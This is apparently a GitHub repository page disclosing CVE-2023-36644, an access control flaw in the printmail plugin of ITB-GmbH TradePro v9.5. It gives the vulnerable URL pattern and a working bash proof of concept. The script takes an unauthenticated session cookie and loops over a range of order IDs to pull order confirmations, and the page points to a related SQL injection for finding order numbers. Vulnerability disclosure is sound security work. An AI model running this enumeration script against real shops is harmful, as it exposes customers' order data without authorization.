caffeinated-labs / CVE-2023-36644

Home Page:https://www.cve.org/CVERecord?id=CVE-2023-36644

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Affected Software

Vendor: ITB-GmbH
Affected Products: TradePro (v9.5)
Component: Printmail Plugin
Confirmed: yes

Attack Vector

Type: Incorrect Access Control
Access-Type: Remote
Impact: Information Disclosure

Incorrect Access Control in the printmail plugin in ITB-GmbH TradePro v9.5 allows remote attackers to receive all order confirmations from the online shop by passing arbitrary order numbers to an http(s) endpoint.

Description

The orderid should be known beforehand but can be enumerated easily or by using an SQLi (see Report CVE-2023-36645)

Calling http(s)://[DOMAIN]/shop/de/?plugin=printmail&wkid=[COOKIE]&orderid=[ORDER_ID] with a valid but unauthenticated session cookie gives the attacker access to all order confirmations.

PoC

#! /bin/bash
DOMAIN=$1
TEST_PATH="shop/de/sys/"
#TEST_PATH="shop/de/"
SAMPLE1_ID=0


COOKIE=$(curl -s -c - $DOMAIN | grep sessiontradepro | cut -f7)
echo "Got Cookie: $COOKIE"
SAMPLE1=$(curl -s -w '\nsize_download %{size_download}' "$DOMAIN/$TEST_PATH?plugin=printmail&wkid=$COOKIE&orderid=$SAMPLE1_ID" | grep size_download | cut -d" " -f2)
echo Test URL: "$DOMAIN/$TEST_PATH?plugin=printmail&wkid=$COOKIE&orderid=%ID%"
echo "========"
echo $SAMPLE1_ID $SAMPLE1
for SAMPLE2_ID in {24000..25000}
 do
   SAMPLE2=$(curl -s -w '\nsize_download %{size_download}' "$DOMAIN/$TEST_PATH?plugin=printmail&wkid=$COOKIE&orderid=$SAMPLE2_ID" | grep size_download | cut -d" " -f2)
   echo $SAMPLE2_ID $SAMPLE2
done

Credits

About

https://www.cve.org/CVERecord?id=CVE-2023-36644


Languages

Language:Shell 100.0%